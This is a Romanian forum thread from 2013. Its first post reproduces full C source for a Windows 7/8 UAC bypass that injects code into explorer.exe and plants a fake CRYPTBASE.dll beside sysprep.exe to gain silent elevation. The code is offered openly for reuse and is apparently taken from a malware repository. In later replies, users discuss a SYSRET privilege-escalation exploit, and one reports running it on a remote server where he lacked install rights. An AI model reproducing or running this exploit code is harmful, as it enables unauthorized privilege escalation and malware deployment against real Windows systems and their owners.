Nytro Posted March 4, 2013 Report Posted March 4, 2013 UAC Bypass for Windows 7 RTM, SP1 / Windows 8 DP/* UAC Bypass for Windows 7 RTM, SP1 / Windows 8 DP, CP all 32-bit for admin with default UAC settings Effectively bypasses the UAC rights, because of: 1. "auto-elevation" for certain processes started from explorer.exe 2. anyone can inject anything to explorer.exe This was reported to Microsoft multiple times (months ago) and they are too lame to fix injection to explorer.exe. I've followed the responsible disclosure guidelines, no need to get angry on me. TDL4 is using the bypass for 64-bit already. (C) 2012 K. Kleissner, Published under EUPL - Take it, use it. Implement it as below, be aware the code makes a copy of itself (the "own" exe) and changes it to be a dll (so be aware of the WinMain -> DllMain entry point implications!). int UACBypass(); int main() { OSVERSIONINFO VersionInfo; VersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&VersionInfo); // Windows 7, 8: Try injecting into auto-elevated process if admin and UAC is on default (prompts 2 times on guest with credential UI so you should add a check for guest) if (VersionInfo.dwMajorVersion == 6 && (VersionInfo.dwMinorVersion == 1 || VersionInfo.dwMinorVersion == 2) && !IsUserElevatedAdmin()) UACBypass(); // ... your code here ... } BOOL IsUserElevatedAdmin() { SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; PSID SecurityIdentifier; if (!AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &SecurityIdentifier)) return 0; BOOL IsAdminMember; if (!CheckTokenMembership(NULL, SecurityIdentifier, &IsAdminMember)) IsAdminMember = FALSE; FreeSid(SecurityIdentifier); return IsAdminMember; }*/// WARNING: This code leaves crytpbase.dll in sysprep directory!// This is cleaned up and heavily modified code from originally http://www.pretentiousname.com/misc/win7_uac_whitelist2.html (Win7Elevate_Inject)#define _HAS_EXCEPTIONS 0 #include <windows.h>#include <commctrl.h>#include <shlobj.h>#include <psapi.h>struct InjectArgs{ // Functions BOOL (WINAPI *FFreeLibrary)(HMODULE hLibModule); HMODULE (WINAPI *FLoadLibrary)(LPCWSTR lpLibFileName); FARPROC (WINAPI *FGetProcAddress)(HMODULE hModule, LPCSTR lpProcName); BOOL (WINAPI *FCloseHandle)(HANDLE); DWORD (WINAPI *FWaitForSingleObject)(HANDLE,DWORD); // Static strings wchar_t szSourceDll[MAX_PATH]; wchar_t szElevDir[MAX_PATH]; wchar_t szElevDll[MAX_PATH]; wchar_t szElevDllFull[MAX_PATH]; wchar_t szElevExeFull[MAX_PATH]; wchar_t szElevArgs[MAX_PATH]; wchar_t szEIFOMoniker[MAX_PATH]; // szElevatedIFileOperationMoniker // some GUIDs IID pIID_EIFO; IID pIID_ShellItem2; IID pIID_Unknown; // Dll and import strings wchar_t NameShell32[20]; wchar_t NameOle32[20]; char NameCoInitialize[20]; char NameCoUninitialize[20]; char NameCoGetObject[20]; char NameCoCreateInstance[20]; char NameSHCreateItemFromParsingName[30]; char NameShellExecuteExW[20]; // IMPORTANT: Allocating structures here (so we know where it was allocated) SHELLEXECUTEINFO shinfo; BIND_OPTS3 bo;};// important: error code here is passed back to original process (1 = success, 0 = failure)static DWORD WINAPI RemoteCodeFunc(InjectArgs * Args){ // don't rely on any static data here as this function is copied alone into remote process! (we assume at least that kernel32 is at same address) NTSTATUS Status = 0; // Use an elevated FileOperation object to copy a file to a protected folder. // If we're in a process that can do silent COM elevation then we can do this without any prompts. HMODULE ModuleOle32 = Args->FLoadLibrary(Args->NameOle32); HMODULE ModuleShell32 = Args->FLoadLibrary(Args->NameShell32); if (!ModuleOle32 || !ModuleShell32) return 0; // Load the non-Kernel32.dll functions that we need. HRESULT (WINAPI * FCoInitialize)(LPVOID pvReserved) = (HRESULT (WINAPI * )(LPVOID pvReserved))Args->FGetProcAddress(ModuleOle32, Args->NameCoInitialize); void (WINAPI * FCoUninitialize)(void) = (void (WINAPI * )(void))Args->FGetProcAddress(ModuleOle32, Args->NameCoUninitialize); HRESULT (WINAPI * FCoGetObject)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoGetObject); HRESULT (WINAPI * FCoCreateInstance)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) = (HRESULT (WINAPI * )(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoCreateInstance); HRESULT (WINAPI * FSHCreateItemFromParsingName)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleShell32, Args->NameSHCreateItemFromParsingName); BOOL (WINAPI * FShellExecuteEx)(LPSHELLEXECUTEINFOW lpExecInfo) = (BOOL (WINAPI * )(LPSHELLEXECUTEINFOW lpExecInfo))Args->FGetProcAddress(ModuleShell32, Args->NameShellExecuteExW); if (!FCoInitialize || !FCoUninitialize || !FCoGetObject || !FCoCreateInstance || !FSHCreateItemFromParsingName || !FShellExecuteEx || FCoInitialize(NULL) != S_OK) return 0; Args->bo.cbStruct = sizeof(BIND_OPTS3); Args->bo.dwClassContext = CLSCTX_LOCAL_SERVER; // For testing other COM objects/methods, start here. IFileOperation *pFileOp = 0; IShellItem *pSHISource = 0; IShellItem *pSHIDestination = 0; IShellItem *pSHIDelete = 0; // This is a completely standard call to IFileOperation, if you ignore all the pArgs/func-pointer indirection. if (FCoGetObject(Args->szEIFOMoniker, &Args->bo, Args->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)) == S_OK && pFileOp && pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION|FOF_NOERRORUI) == S_OK && // FOF_NOERRORUI is important here to not show error messages, copying fails on guest (takes wrong path) FSHCreateItemFromParsingName( Args->szSourceDll, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)) == S_OK && pSHISource && FSHCreateItemFromParsingName( Args->szElevDir, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)) == S_OK && pSHIDestination && pFileOp->CopyItem(pSHISource, pSHIDestination, Args->szElevDll, NULL) == S_OK && pFileOp->PerformOperations() == S_OK) { // Use ShellExecuteEx to launch the "part 2" target process. Again, a completely standard API call. // (Note: Don't use CreateProcess as it seems not to do the auto-elevation stuff.) Args->shinfo.cbSize = sizeof(SHELLEXECUTEINFO); Args->shinfo.fMask = SEE_MASK_NOCLOSEPROCESS; Args->shinfo.lpFile = Args->szElevExeFull; Args->shinfo.lpParameters = Args->szElevArgs; Args->shinfo.lpDirectory = Args->szElevDir; Args->shinfo.nShow = SW_SHOW; // update: we assume the cryptbase.dll deletes itself (no waiting for syspreps execution although it would be possible) if ((Status = FShellExecuteEx(&Args->shinfo))) { Args->FCloseHandle(Args->shinfo.hProcess); } } // clean-up if (pSHIDelete) { pSHIDelete->Release(); } if (pSHIDestination) { pSHIDestination->Release(); } if (pSHISource) { pSHISource->Release(); } if (pFileOp) { pFileOp->Release(); } FCoUninitialize(); Args->FFreeLibrary(ModuleShell32); Args->FFreeLibrary(ModuleOle32); return Status;}// returns 1 when you can expect everything worked fine!int AttemptOperation(bool bInject, HANDLE TargetProcess, const wchar_t *szPathToOurDll){ NTSTATUS Status = 0; const BYTE * codeStartAdr = (BYTE *)RemoteCodeFunc; const BYTE * codeEndAdr = (BYTE *)AttemptOperation; if (codeStartAdr >= codeEndAdr) // ensure we don't copy crap return 0; // Here we define the target process and DLL for "part 2." This is an auto/silent-elevating process which isn't // directly below System32 and which loads a DLL which is directly below System32 but isn't on the OS's "Known DLLs" list. // If we copy our own DLL with the same name to the exe's folder then the exe will load our DLL instead of the real one. // set up arguments InjectArgs ia; memset(&ia, 0, sizeof(ia)); ia.FFreeLibrary = FreeLibrary; ia.FLoadLibrary = LoadLibrary; ia.FGetProcAddress = GetProcAddress; ia.FCloseHandle = CloseHandle; ia.FWaitForSingleObject = WaitForSingleObject; wcscpy(ia.NameShell32, L"shell32.dll"); wcscpy(ia.NameOle32, L"ole32.dll"); strcpy(ia.NameCoInitialize, "CoInitialize"); strcpy(ia.NameCoUninitialize, "CoUninitialize"); strcpy(ia.NameCoGetObject, "CoGetObject"); strcpy(ia.NameCoCreateInstance, "CoCreateInstance"); strcpy(ia.NameSHCreateItemFromParsingName, "SHCreateItemFromParsingName"); strcpy(ia.NameShellExecuteExW, "ShellExecuteExW"); wchar_t SystemDirectory[MAX_PATH]; if (!GetSystemDirectory(SystemDirectory, MAX_PATH)) return 0; wcscpy(ia.szSourceDll, szPathToOurDll); wcscpy(ia.szElevDir, SystemDirectory); wcscat(ia.szElevDir, L"\\sysprep"); wcscpy(ia.szElevDll, L"CRYPTBASE.dll"); wcscpy(ia.szElevExeFull, SystemDirectory); wcscat(ia.szElevExeFull, L"\\sysprep\\sysprep.exe"); wcscpy(ia.szEIFOMoniker, L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}"); memcpy(&ia.pIID_EIFO, &__uuidof(IFileOperation), sizeof(GUID)); memcpy(&ia.pIID_ShellItem2, &__uuidof(IShellItem2), sizeof(GUID)); memcpy(&ia.pIID_Unknown, &__uuidof(IUnknown), sizeof(GUID)); if (!bInject) { // Test code without remoting. // This should result in a UAC prompt, if UAC is on at all and we haven't been launched as admin. Status = RemoteCodeFunc(&ia); } else { // Test code with remoting. // At least as of RC1 build 7100, with the default OS settings, this will run the specified command // with elevation but without triggering a UAC prompt. void * RemoteArgs = VirtualAllocEx(TargetProcess, 0, sizeof(ia), MEM_COMMIT, PAGE_READWRITE); if (!RemoteArgs || !WriteProcessMemory(TargetProcess, RemoteArgs, &ia, sizeof(ia), NULL)) return 0; void * RemoteCode = VirtualAllocEx(TargetProcess, 0, codeEndAdr - codeStartAdr, MEM_COMMIT, PAGE_EXECUTE_READ); if (!RemoteCode || !WriteProcessMemory(TargetProcess, RemoteCode, RemoteCodeFunc, codeEndAdr - codeStartAdr, NULL)) return 0; HANDLE hRemoteThread = CreateRemoteThread(TargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)RemoteCode, RemoteArgs, 0, NULL); if (!hRemoteThread) return 0; // intelligent logit to wait for the execution and grabbing the exit code DWORD dwWaitRes = WaitForSingleObject(hRemoteThread, 40000); if (dwWaitRes == WAIT_OBJECT_0) GetExitCodeThread(hRemoteThread, (DWORD *)&Status); CloseHandle(hRemoteThread); } return Status;}int UACBypass(){ // Step 1: find explorer.exe process we can inject to (to-do: maybe using some other process?) DWORD Processes[1024], BytesReturned; if (!EnumProcesses(Processes, sizeof(Processes), &BytesReturned)) return 0; HANDLE TargetProcess = NULL; for (unsigned i = 0; i < BytesReturned / 4; i++) { if (Processes[i] != 0) { TargetProcess = OpenProcess(/*PROCESS_QUERY_INFORMATION | PROCESS_VM_READ*/PROCESS_ALL_ACCESS, FALSE, Processes[i]); // Get the process name. if (TargetProcess) { HMODULE hMod; DWORD cbNeeded; if (EnumProcessModules(TargetProcess, &hMod, sizeof(hMod), &cbNeeded) ) { wchar_t ProcessName[MAX_PATH]; GetModuleBaseName(TargetProcess, hMod, ProcessName, sizeof(ProcessName)/sizeof(TCHAR) ); if (_wcsicmp(ProcessName, L"explorer.exe") == 0) break; } CloseHandle(TargetProcess); TargetProcess = NULL; } } } if (!TargetProcess) return 0; // Step 2: Creating fake cryptbase.dll that is this exe with the IMAGE_FILE_DLL flag set in PE header wchar_t SelfFileName[MAX_PATH]; if (!GetModuleFileNameW(NULL, SelfFileName, MAX_PATH)) { CloseHandle(TargetProcess); return 0; } wchar_t FakeCrytbase[MAX_PATH]; GetTempPathW(MAX_PATH, FakeCrytbase); GetTempFileNameW(FakeCrytbase, L"tmp", 0, FakeCrytbase); if (!CopyFile(SelfFileName, FakeCrytbase, 0)) { CloseHandle(TargetProcess); return 0; } HANDLE FakeFile = CreateFileW(FakeCrytbase, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (FakeFile == INVALID_HANDLE_VALUE) { CloseHandle(TargetProcess); return 0; } DWORD NumberOfBytesRead; BYTE ImageHeader[4096]; if (!ReadFile(FakeFile, ImageHeader, 4096, &NumberOfBytesRead, NULL)) { CloseHandle(TargetProcess); CloseHandle(FakeFile); return 0; } PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)ImageHeader; PIMAGE_NT_HEADERS old_header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(ImageHeader))[dos_header->e_lfanew]; // set the dll flag (IMAGE_FILE_DLL) old_header->FileHeader.Characteristics |= IMAGE_FILE_DLL; DWORD NumberOfBytesWritten; if (SetFilePointer(FakeFile, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !WriteFile(FakeFile, ImageHeader, 4096, &NumberOfBytesWritten, NULL)) { CloseHandle(TargetProcess); CloseHandle(FakeFile); return 0; } CloseHandle(FakeFile); // Step 3: Using the exploit NTSTATUS Status = AttemptOperation(1, TargetProcess, FakeCrytbase); CloseHandle(TargetProcess); DeleteFile(FakeCrytbase); // exit if we can assume that the elevation worked correctly, and this executable was started with auto-elevated rights if (Status) ExitProcess(1); return 1;}Sursa: Index of /repository/malwares/uacGasit din intamplare. Quote
NOVATu Posted March 5, 2013 Report Posted March 5, 2013 Ceva de genul asta,ar fi in tutorialul asta:Windows 7 Privilege Escelation & UAC Bypass Guide with SYSRET exploitCa o intrebare,ar merge bypass-ul asta pe RDP-uri?Daca testati si merge sa spuneti. 1 Quote
Shin Posted March 5, 2013 Report Posted March 5, 2013 Cred ca merge ca bypass de UAC dar asta tot nu-ti da admin rights, nu? Quote
Nytro Posted March 5, 2013 Author Report Posted March 5, 2013 Ceva de genul asta,ar fi in tutorialul asta:Ca o intrebare,ar merge bypass-ul asta pe RDP-uri?Daca testati si merge sa spuneti.Ala nu mai e "UAC bypass", din moment ce ai Privilege Escalation faci ce vor muschii tai.Problema e ca exploit-ul de SYSRET merge in primul rand doar pe x64, in al doilea rand daca Windows-ul nu e cu update-urile la zi. Quote
Maximus Posted March 7, 2013 Report Posted March 7, 2013 pe x64 merge, am testat//editmasina se incadreaza in cele spuse de nytro Quote
NOVATu Posted March 15, 2013 Report Posted March 15, 2013 Confirm si eu ca merge exploitul sysret,testat pe un rdp,unde nu puteam sa instalez nimic.Acu totul ok Configuratia rdp-uluiOperating System: Windows Server 2008 R2 Standard 64-bit (6.1, Build 7600) (7600.win7_gdr.110622-1503) Language: English (Regional Setting: English)System Manufacturer: Dell Inc. System Model: PowerEdge T610 BIOS: Phoenix ROM BIOS PLUS Version 1.10 2.1.9 Processor: Intel® Xeon® CPU E5520 @ 2.27GHz (16 CPUs), ~2.3GHz Memory: 24576MB RAMAvailable OS Memory: 24566MB RAM Page File: 4468MB used, 60096MB availableDar acuma,cmd-ul nu se mai inchide este normal? Quote
Nytro Posted March 15, 2013 Author Report Posted March 15, 2013 Confirm si eu ca merge exploitul sysret,testat pe un rdp,unde nu puteam sa instalez nimic.Acu totul ok Configuratia rdp-uluiDar acuma,cmd-ul nu se mai inchide este normal?Da, inchizi procesul (Hostcon sau cum cacat apare) sin Task Manager. Quote
